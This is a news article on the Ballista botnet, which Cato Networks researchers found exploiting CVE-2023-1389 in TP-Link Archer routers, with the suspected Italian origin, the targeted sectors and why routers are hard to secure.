Team CryptoInsightfull 
A model of internet routers marketed to consumers and businesses is being targeted as part of an effort to grow a new botnet known as Ballista.
Researchers at cybersecurity firm Cato Networks said that during a recent investigation into router vulnerabilities, they discovered the botnet infecting TP-Link Archer routers.
The hacker behind the malware, who they believe is based in Italy, has been exploiting a firmware vulnerability tracked as CVE-2023-1389 to allow the botnet to “spread itself automatically over the Internet” through the unpatched TP-Link devices.
The Cybersecurity and Infrastructure Security Agency previously confirmed that CVE-2023-1389 is being exploited in the wild and ordered U.S. civilian agencies to patch the bug The documentation for the vulnerability and the patch emphasize the TP-Link model known as AX21 or AX1800.
Ofek Vardi, security engineer at Cato Networks, said the researchers are moderately confident the hacker is based in Italy because of the IP address location of the command and control (C2) server and because of Italian-language strings found within the malware’s code.
“We suspect we caught this campaign in its early stages. We saw it evolving, as within a short timeframe, the threat actor changed the initial dropper to allow stealthier connections to the C2 server through the Tor network,” said Matan Mittelman, threat prevention team leader at Cato Networks.
“In this particular campaign, the malware allows the attacker to run arbitrary commands on compromised devices. This suggests the malware author may have bigger plans than a regular DDoS-for-hire botnet.”
Cato’s security team first identified this campaign on January 10 and saw several initial-access attempts over the court of a few weeks, with the most recent coming on February 17.
Vardi noted that the malware was written in a way that would allow new capabilities to be added to future variants.
The researchers declined to comment on whether Italian or European authorities have been notified of the threat actor or the campaign.
The researchers said they named the botnet Ballista as a reference to an ancient Roman weapon and said it has targeted manufacturing, healthcare, services and technology organizations in the U.S., Australia, China and Mexico.
A search on cybersecurity platform Censys found more than 6,000 vulnerable devices connected to the Internet, they said, adding that the botnet is still active.
The malware fully takes over a device and reads configuration files on the system before setting up encrypted links and attempting to spread to other devices automatically by exploiting CVE-2023-1389.
Cato Networks found some evidence that the threat actor involved deploys tools to potentially steal data from infected networks.The IP address tied to the threat actor is no longer responding, the researchers said, adding that they have found a new variant of the malware on the code repository GitHub.
“This suggests an increase in the sophistication level of the campaign by the threat actor. While this malware sample shares similarities with other botnets, it remains distinct from widely used botnets such as Mirai and Mozi,” they said.
Both Vardi and Mittelman said their findings illustrate why Internet of Things (IoT) devices like routers are constantly targeted by malicious hackers. They often have weak passwords and are typically not well-maintained. Most do not have automated security patching, leaving them vulnerable to bugs for months and potentially years.
“Over the years, major IoT botnets like Mirai and Mozi have proven how easily routers can be exploited and threat actors have taken note,” Mittelman said. “Two key issues have played in their favor: the fact that users rarely deploy new firmware to their routers, coupled with the lack of regard for security by router vendors.”
U.S. officials in recent months have raised alarms about TP-Link routers specifically because they are repeatedly being exploited by Chinese hackers who have used them to breach telecommunications giants and critical infrastructure.
For years, critical vulnerabilities in TP-Link routers have been abused by hackers who use them as cover for subsequent attacks or add them to powerful botnets that disrupt websites with bogus traffic.
The Wall Street Journal reported in December that U.S. agencies have considered banning TP-Link devices.
Recorded Future
Intelligence Cloud.
